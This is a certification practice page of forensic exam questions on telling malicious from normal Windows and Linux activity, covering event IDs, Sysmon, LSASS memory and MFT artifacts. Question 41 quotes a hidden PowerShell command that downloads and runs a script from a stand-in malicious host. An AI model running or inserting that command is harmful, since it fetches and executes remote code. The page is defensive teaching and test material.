You must correlate Windows event logs, Sysmon, and memory artifacts to identify malicious activity like credential dumping or anomalous logons. The single most important thing is to verify the context of event IDs and logon types before concluding malice.
Start practicing
Identification of Malicious and Normal Activity — choose a session length
Free · No account required
Domain overview
This domain tests your ability to distinguish malicious from benign activity using Windows artifacts: Security event logs, Sysmon, memory, and file system metadata. Questions present scenarios like credential dumping, logon anomalies, or botnet triage and ask which artifacts or event IDs confirm the activity. You must know event IDs, logon types, and tool outputs.
Exam objectives
Windows Security event IDs: 4624, 4625, 4672, 4688, and logon types 3, 10
Sysmon event IDs for process creation, network connections, and image loads
Memory analysis artifacts for credential dumping: LSASS access, SAM, and cached credentials
Windows file system metadata: $MFT, $UsnJrnl, prefetch, and shimcache for execution evidence
Assuming Event ID 4624 with Logon Type 3 always indicates malicious lateral movement, ignoring legitimate service or scheduled task logons.
Confusing Event ID 4672 (special privileges assigned) as proof of compromise, when it also occurs for legitimate admin logons.
Overlooking that Sysmon must be installed and configured; default Windows logs do not capture process creation or network connections.
Click any question to see the full explanation and answer options, or start a focused practice session above.
An analyst reviewing Windows event logs on a compromised workstation discovers a sudden spike in Event ID 4624 with Logon Type 3, followed immediately by Event ID 4672. The source IP address belongs to a non-routable internal subnet. Which forensic interpretation best explains this activity?
2An analyst identifies a process performing unexpected DNS queries to a top-level domain ending in .xyz every 60 seconds. What is the most effective initial host-based action to confirm malicious beaconing?
3Refer to the exhibit. An analyst observes this process execution on a domain controller. What indicator suggests this activity is likely malicious?
4Which log artifact provides the most reliable evidence that a user account was used for an interactive remote login rather than a scheduled task?
5An analyst observes PowerShell usage with the encoded command flag '-e'. What is the standard forensic approach to de-obfuscate and analyze this activity?
6Which THREE of the following are considered 'living-off-the-land' (LotL) techniques used by attackers to avoid detection?
7When reviewing firewall logs, what activity should be flagged as an immediate indicator of a potential port scan?
8Refer to the exhibit. What is the most critical security concern presented by the second command line?
9Which log category should an analyst examine to identify a potential 'Pass-the-Hash' attack?
10What is the primary forensic value of examining MFT (Master File Table) $Standard_Information vs $File_Name attributes?
11Which indicator is most effective for identifying a 'Golden Ticket' attack during Kerberos-based authentication?
12Which TWO of the following behaviors are common indicators of fileless malware execution that a forensic analyst should look for in memory artifacts?
13When reviewing Windows Event Logs, which event ID indicates that a user has successfully performed an interactive login, and why is this critical for identifying unauthorized lateral movement?
14Which forensic artifact is most useful for determining if a user has recently opened a specific suspicious file, even if that file has since been deleted?
15You are analyzing a system and find evidence that a user has executed a PowerShell script that imports the 'Net.WebClient' class. What is the most likely purpose of this script?
16An analyst observes a high volume of '4625' events for a single user account. What does this indicate and what is the appropriate initial response?
17During an investigation of a compromised Windows 10 workstation, a forensic analyst reviews the NTFS $MFT and observes that the Standard Information Attribute (SIA) timestamps for a suspicious executable in C:\Windows\Temp are all identical, while the File Name Attribute (FNA) timestamps show a different, earlier date. The executable has no corresponding Prefetch file. Which conclusion is most strongly supported by these artifacts?
18During a live response on a Windows 10 workstation, you observe a process named 'lsass.exe' with PID 672. Its parent process is 'winlogon.exe' (PID 596), and its executable path is 'C:\Windows\System32\lsass.exe'. However, the process has an open handle to a suspicious named pipe '\\.\pipe\evil'. Based on this evidence, what is the most likely explanation?
19A forensic analyst is reviewing Windows Security event logs to identify potential malicious activity. The analyst notices a series of Event ID 4625 (An account failed to log on) followed by Event ID 4624 (An account was successfully logged on) for the same user account within a short period. What is the most likely explanation for this pattern?
20An analyst is investigating a suspected credential dumping incident on a Windows Server 2016 domain controller. The analyst has acquired a memory image and the Windows event logs. Which TWO of the following artifacts would provide the most direct evidence that LSASS memory was accessed for credential theft? (Choose two.)
21A forensic analyst is reviewing a Windows 10 system suspected of being infected with malware that maintains persistence. The analyst notices a new service named 'Windows Update Helper' with a binary path pointing to C:\Users\Public\updater.exe. The service is set to start automatically. Which artifact would best confirm that this service was created recently and is not a legitimate Windows service?
22During an investigation of a Windows Server 2019 host, you review the Security event log and find Event ID 4624 entries with Logon Type 3 originating from a workstation subnet that should never authenticate to this server. The associated 4672 entry shows SeDebugPrivilege assigned to the resulting token. The account name is a normal helpdesk user. Which conclusion is most defensible from these artifacts alone?
23A forensic analyst is reviewing a Windows 10 system and finds that a scheduled task named 'Updater' was created to run a PowerShell script every hour. The task's action is powershell.exe -WindowStyle Hidden -EncodedCommand <base64>. The task was created by a user account that normally does not perform administrative tasks. Which of the following best describes the forensic significance of this finding?
24During a compromise assessment on a Windows 10 workstation, an analyst runs a volatile memory capture and inspects the process list in Volatility 3. The analyst observes a process named 'lsass.exe' with PID 872, whose parent process is 'winlogon.exe' with PID 640. The executable path recorded for lsass.exe is 'C:\Windows\System32\lsass.exe'. Which conclusion is BEST supported by these artifacts?
25An analyst is examining a Linux server that is suspected of being compromised. The analyst runs 'netstat -anp' and observes a process named 'kworker' with PID 1234 listening on TCP port 4444. The analyst knows that legitimate kworker processes are kernel threads and do not open network sockets. Which of the following conclusions is most appropriate?
26During an intrusion investigation on a Windows 10 workstation, an analyst observes that several user-mode processes have established TCP connections to 203.0.113.45:443. The analyst wants to determine which executable image on disk was responsible for the network activity and whether the process is still running. Which artifact provides the most direct evidence by mapping a live network connection to its owning process executable path?
27An analyst is reviewing a Windows Server 2019 host and finds that a scheduled task named 'MicrosoftEdgeUpdateTaskMachineUA' exists under Task Scheduler Library\Microsoft\EdgeUpdate. The task's action launches 'C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe' with the argument '/ua', and the task's XML shows it was created by 'NT AUTHORITY\SYSTEM'. The XML file in C:\Windows\System32\Tasks was last modified three months ago, matching the install date of Edge. Which assessment is MOST accurate?
28A forensic analyst is analyzing a Windows 10 memory image and finds a process named 'svchost.exe' with PID 4567. The process's parent is 'services.exe', but its executable path is C:\Users\Public\svchost.exe. The analyst also notices that the process has a network connection to an external IP on port 443. Which of the following is the most likely explanation for this finding?
29An analyst is examining a Linux server suspected of compromise. In /var/log/auth.log, they observe repeated entries of the form: 'sshd[1234]: Accepted publickey for deploy from 10.20.30.40 port 51515 ssh2: RSA SHA256:...' followed by 'sshd[1234]: pam_unix(sshd:session): session opened for user deploy'. No corresponding 'Failed password' entries appear for that source IP. Which interpretation is MOST accurate?
30An analyst is triaging a Linux server and finds a process whose /proc/<pid>/exe symlink points to /tmp/.kwork, and whose parent process is the legitimate cron daemon. The file is owned by root but has no package ownership record. Which interpretation is most appropriate?
31While reviewing a Windows host, you find a 4688 process creation event where the new process is C:\Windows\System32\svchost.exe but the parent process image is C:\Users\bob\AppData\Local\Temp\update.exe. The command line for svchost.exe contains -k netsvcs with no additional arguments. Which assessment is best supported?
32A forensic analyst is triaging a Windows 10 endpoint that is suspected of being part of a botnet. The analyst has collected the Security, System, and Application event logs, the Sysmon operational log, and a live memory image. Which TWO of the following artifacts would provide the most direct evidence of periodic command-and-control beaconing behavior? (Choose two.)
33An analyst reviewing a Windows workstation finds that the file C:\Windows\System32\drivers\etc\hosts has been modified and now contains several entries mapping well-known banking domains to 127.0.0.1. The file's LastWriteTime is two days ago, and no administrator has reported making the change. Which conclusion is MOST appropriate?
34You are reviewing a Windows Server 2019 Security event log and find Event ID 4624 with Logon Type 3 and the 'NTLM' authentication package for a service account, occurring at 02:14 from a workstation that has no corresponding 4648 or 4672 events. Which interpretation is most forensically sound?
35You are analyzing a Linux web server and find that /var/log/auth.log contains many 'Failed password' entries followed by a single 'Accepted password' for the account 'deploy' from the same source IP. Shortly after, you see a sudo command adding a new user named 'support' to the sudoers file. Which sequence best describes what occurred?
36A forensic analyst is examining a Windows Server 2016 system that is suspected of being compromised. The analyst runs 'wevtutil qe Security /f:text /q:"*[System[(EventID=4688)]]"' and notices that many process creation events have the 'Subject Logon ID' field set to '0x3e7'. Which of the following best describes the significance of this finding?
37A forensic analyst is reviewing a compromised Windows 10 host and finds a file named 'lsass.exe' in the C:\Windows\Temp directory. The file has a creation timestamp that coincides with the suspected intrusion time. The analyst wants to determine if this file is a malicious copy of the legitimate Windows process. Which characteristic of the legitimate lsass.exe should the analyst verify first to confirm the file is suspicious?
38While triaging a Linux web server, you find that '/usr/bin/sshd' was executed but the running process's parent is 'bash' rather than the systemd service manager, and the process has no associated listening socket. Which conclusion is best supported?
39An analyst is reviewing a memory dump from a Windows 10 system using Volatility 3. The analyst runs 'vol.py -f memory.dmp windows.netscan' and observes a TCP connection with a state of 'ESTABLISHED' between the local IP 10.0.0.5:49152 and a remote IP 203.0.113.45:443. The process associated with this connection is 'chrome.exe' (PID 1234). Which of the following should the analyst do next to determine if this connection is malicious?
40An analyst is reconstructing a suspected credential-dumping incident on a Windows 10 host and has already imaged memory. Which TWO artifacts should the analyst examine to determine whether the LSASS process memory was accessed by an unauthorized tool? (Choose two.)
41A security analyst is examining a Windows 10 system and finds a scheduled task named 'Updater' that runs 'powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/payload.ps1')"' every hour. The task is configured to run under the SYSTEM account. Which of the following best describes the malicious technique being used?
42You are examining a Windows 10 host and find a scheduled task whose XML action launches 'rundll32.exe' with the argument 'C:\ProgramData\Microsoft\Crypto\RSA\logon.dll,Register'. The task's author is a domain user who has never logged on to this machine, and the DLL has a creation timestamp matching the suspected intrusion window. Which assessment is best supported?
43A forensic analyst is investigating a Windows workstation that is suspected of being compromised by a fileless malware attack. The analyst has acquired a memory image and a disk image. Which TWO of the following artifacts, when analyzed together, would provide the strongest evidence that a fileless attack has occurred and is currently active? (Choose two.)
You must correlate Windows event logs, Sysmon, and memory artifacts to identify malicious activity like credential dumping or anomalous logons. The single most important thing is to verify the context of event IDs and logon types before concluding malice.
The Courseiva GCFA question bank contains 43 questions in the Identification of Malicious and Normal Activity domain. Click any question to see the full explanation and answer breakdown.
Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.
Yes — the session launcher on this page draws questions exclusively from the Identification of Malicious and Normal Activity domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.
Save your results, see per-domain analytics, and get readiness scores — free, for every certification.
Sign Up FreeFree forever · Every certification included